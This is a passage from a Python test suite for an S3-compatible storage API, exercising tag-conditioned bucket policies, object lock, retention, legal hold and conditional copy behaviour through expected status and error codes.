resource = _make_arn_resource("{}/{}".format(bucket_name, "*"))
policy_document = make_json_policy("s3:GetObjectAcl",
resource,
conditions=tag_conditional)
client.put_bucket_policy(Bucket=bucket_name, Policy=policy_document)
tagset = []
tagset.append({'Key': 'security', 'Value': 'public'})
tagset.append({'Key': 'foo', 'Value': 'bar'})
input_tagset = {'TagSet': tagset}
response = client.put_object_tagging(Bucket=bucket_name, Key='publictag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset2 = []
tagset2.append({'Key': 'security', 'Value': 'private'})
input_tagset = {'TagSet': tagset2}
response = client.put_object_tagging(Bucket=bucket_name, Key='privatetag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
tagset3 = []
tagset3.append({'Key': 'security1', 'Value': 'public'})
input_tagset = {'TagSet': tagset3}
response = client.put_object_tagging(Bucket=bucket_name, Key='invalidtag', Tagging=input_tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
alt_client = get_alt_client()
response = alt_client.get_object_acl(Bucket=bucket_name, Key='publictag')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
# A get object itself should fail since we allowed only GetObjectTagging
e = assert_raises(ClientError, alt_client.get_object, Bucket=bucket_name, Key='publictag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='privatetag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
e = assert_raises(ClientError, alt_client.get_object_tagging, Bucket=bucket_name, Key='invalidtag')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with defalut retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_lock():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
response = client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'COMPLIANCE',
'Years':1
}
}}
response = client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.get_bucket_versioning(Bucket=bucket_name)
eq(response['Status'], 'Enabled')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'InvalidBucketState')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with days and years')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_with_days_and_years():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1,
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid days')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_days():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':0
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRetentionPeriod')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid years')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_years():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Years':-1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRetentionPeriod')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid mode')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_years():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'abc',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'governance',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object lock with invalid status')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_lock_invalid_status():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Disabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Years':1
}
}}
e = assert_raises(ClientError, client.put_object_lock_configuration, Bucket=bucket_name, ObjectLockConfiguration=conf)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
attr(resource='bucket')
@attr(method='put')
@attr(operation='Test suspend versioning when object lock enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_suspend_versioning():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
e = assert_raises(ClientError, client.put_bucket_versioning, Bucket=bucket_name, VersioningConfiguration={'Status': 'Suspended'})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'InvalidBucketState')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object lock')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_lock():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
response = client.get_object_lock_configuration(Bucket=bucket_name)
eq(response['ObjectLockConfiguration'], conf)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object lock with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_obj_lock_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_object_lock_configuration, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'ObjectLockConfigurationNotFoundError')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test put object retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
response = client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with bucket object lock not enabled')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with invalid mode')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_invalid_mode():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'governance', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
retention = {'Mode':'abc', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test object retention date formatting')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_retention_iso8601():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
date = datetime.datetime.today() + datetime.timedelta(days=365)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate': date}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
client.meta.events.register('after-call.s3.HeadObject', get_http_response)
client.head_object(Bucket=bucket_name,VersionId=version_id,Key=key)
retain_date = http_response['headers']['x-amz-object-lock-retain-until-date']
isodate.parse_datetime(retain_date)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object retention with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_obj_retention_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
e = assert_raises(ClientError, client.get_object_retention, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention with version id')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_versionid():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, VersionId=version_id, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key, VersionId=version_id)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to override default retention')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_override_default_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
conf = {'ObjectLockEnabled':'Enabled',
'Rule': {
'DefaultRetention':{
'Mode':'GOVERNANCE',
'Days':1
}
}}
client.put_object_lock_configuration(
Bucket=bucket_name,
ObjectLockConfiguration=conf)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to increase retention period')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_increase_period():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention1 = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention1)
retention2 = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention2)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention2)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to shorten period')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_obj_retention_shorten_period():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put object retention to shorten period with bypass header')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_obj_retention_shorten_period_bypass():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
version_id = response['VersionId']
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,3,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention, BypassGovernanceRetention=True)
response = client.get_object_retention(Bucket=bucket_name, Key=key)
eq(response['Retention'], retention)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id, BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with retention')
@attr(assertion='retention period make effects')
@attr('object-lock')
def test_object_lock_delete_object_with_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
e = assert_raises(ClientError, client.delete_object, Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
@attr(resource='object')
@attr(method='delete')
@attr(operation='Test multi-delete object with retention')
@attr(assertion='retention period make effects')
@attr('object-lock')
def test_object_lock_multi_delete_object_with_retention():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key1 = 'file1'
key2 = 'file2'
response1 = client.put_object(Bucket=bucket_name, Body='abc', Key=key1)
response2 = client.put_object(Bucket=bucket_name, Body='abc', Key=key2)
versionId1 = response1['VersionId']
versionId2 = response2['VersionId']
# key1 is under retention, but key2 isn't.
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key1, Retention=retention)
delete_response = client.delete_objects(
Bucket=bucket_name,
Delete={
'Objects': [
{
'Key': key1,
'VersionId': versionId1
},
{
'Key': key2,
'VersionId': versionId2
}
]
}
)
eq(len(delete_response['Deleted']), 1)
eq(len(delete_response['Errors']), 1)
failed_object = delete_response['Errors'][0]
eq(failed_object['Code'], 'AccessDenied')
eq(failed_object['Key'], key1)
eq(failed_object['VersionId'], versionId1)
deleted_object = delete_response['Deleted'][0]
eq(deleted_object['Key'], key2)
eq(deleted_object['VersionId'], versionId2)
delete_response = client.delete_objects(
Bucket=bucket_name,
Delete={
'Objects': [
{
'Key': key1,
'VersionId': versionId1
}
]
},
BypassGovernanceRetention=True
)
assert( ('Errors' not in delete_response) or (len(delete_response['Errors']) == 0) )
eq(len(delete_response['Deleted']), 1)
deleted_object = delete_response['Deleted'][0]
eq(deleted_object['Key'], key1)
eq(deleted_object['VersionId'], versionId1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_put_legal_hold():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
response = client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_legal_hold_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
e = assert_raises(ClientError, client.put_object_legal_hold, Bucket=bucket_name, Key=key, LegalHold=legal_hold)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold with invalid status')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_put_legal_hold_invalid_status():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'abc'}
e = assert_raises(ClientError, client.put_object_legal_hold, Bucket=bucket_name, Key=key, LegalHold=legal_hold)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get legal hold')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_legal_hold():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
response = client.get_object_legal_hold(Bucket=bucket_name, Key=key)
eq(response['LegalHold'], legal_hold)
legal_hold_off = {'Status': 'OFF'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold_off)
response = client.get_object_legal_hold(Bucket=bucket_name, Key=key)
eq(response['LegalHold'], legal_hold_off)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get legal hold with invalid bucket')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_get_legal_hold_invalid_bucket():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
e = assert_raises(ClientError, client.get_object_legal_hold, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidRequest')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with legal hold on')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_delete_object_with_legal_hold_on():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status': 'ON'})
e = assert_raises(ClientError, client.delete_object, Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='Test delete object with legal hold off')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_delete_object_with_legal_hold_off():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
response = client.put_object(Bucket=bucket_name, Body='abc', Key=key)
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status': 'OFF'})
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'])
eq(response['ResponseMetadata']['HTTPStatusCode'], 204)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='Test get object metadata')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_get_obj_metadata():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key)
legal_hold = {'Status': 'ON'}
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold=legal_hold)
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':datetime.datetime(2030,1,1,tzinfo=pytz.UTC)}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ObjectLockMode'], retention['Mode'])
eq(response['ObjectLockRetainUntilDate'], retention['RetainUntilDate'])
eq(response['ObjectLockLegalHoldStatus'], legal_hold['Status'])
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='Test put legal hold and retention when uploading object')
@attr(assertion='success')
@attr('object-lock')
def test_object_lock_uploading_obj():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
key = 'file1'
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=datetime.datetime(2030,1,1,tzinfo=pytz.UTC), ObjectLockLegalHoldStatus='ON')
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ObjectLockMode'], 'GOVERNANCE')
eq(response['ObjectLockRetainUntilDate'], datetime.datetime(2030,1,1,tzinfo=pytz.UTC))
eq(response['ObjectLockLegalHoldStatus'], 'ON')
client.put_object_legal_hold(Bucket=bucket_name, Key=key, LegalHold={'Status':'OFF'})
client.delete_object(Bucket=bucket_name, Key=key, VersionId=response['VersionId'], BypassGovernanceRetention=True)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from GOVERNANCE to COMPLIANCE with bypass')
@attr(assertion='succeeds')
@attr('object-lock')
def test_object_lock_changing_mode_from_governance_with_bypass():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=GOVERNANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=retain_until)
# change mode to COMPLIANCE
retention = {'Mode':'COMPLIANCE', 'RetainUntilDate':retain_until}
client.put_object_retention(Bucket=bucket_name, Key=key, Retention=retention, BypassGovernanceRetention=True)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from GOVERNANCE to COMPLIANCE without bypass')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_changing_mode_from_governance_without_bypass():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=GOVERNANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='GOVERNANCE',
ObjectLockRetainUntilDate=retain_until)
# try to change mode to COMPLIANCE
retention = {'Mode':'COMPLIANCE', 'RetainUntilDate':retain_until}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='put')
@attr(operation='Test changing object retention mode from COMPLIANCE to GOVERNANCE')
@attr(assertion='fails')
@attr('object-lock')
def test_object_lock_changing_mode_from_compliance():
bucket_name = get_new_bucket_name()
key = 'file1'
client = get_client()
client.create_bucket(Bucket=bucket_name, ObjectLockEnabledForBucket=True)
# upload object with mode=COMPLIANCE
retain_until = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=10)
client.put_object(Bucket=bucket_name, Body='abc', Key=key, ObjectLockMode='COMPLIANCE',
ObjectLockRetainUntilDate=retain_until)
# try to change mode to GOVERNANCE
retention = {'Mode':'GOVERNANCE', 'RetainUntilDate':retain_until}
e = assert_raises(ClientError, client.put_object_retention, Bucket=bucket_name, Key=key, Retention=retention)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-match: the latest ETag')
@attr(assertion='succeeds')
def test_copy_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
resp = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
client.copy_object(Bucket=bucket_name, CopySource=bucket_name+'/foo', CopySourceIfMatch=resp['ETag'], Key='bar')
response = client.get_object(Bucket=bucket_name, Key='bar')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='copy')
@attr(operation='copy w/ x-amz-copy-source-if-match: bogus ETag')
@attr(assertion='fails 412')
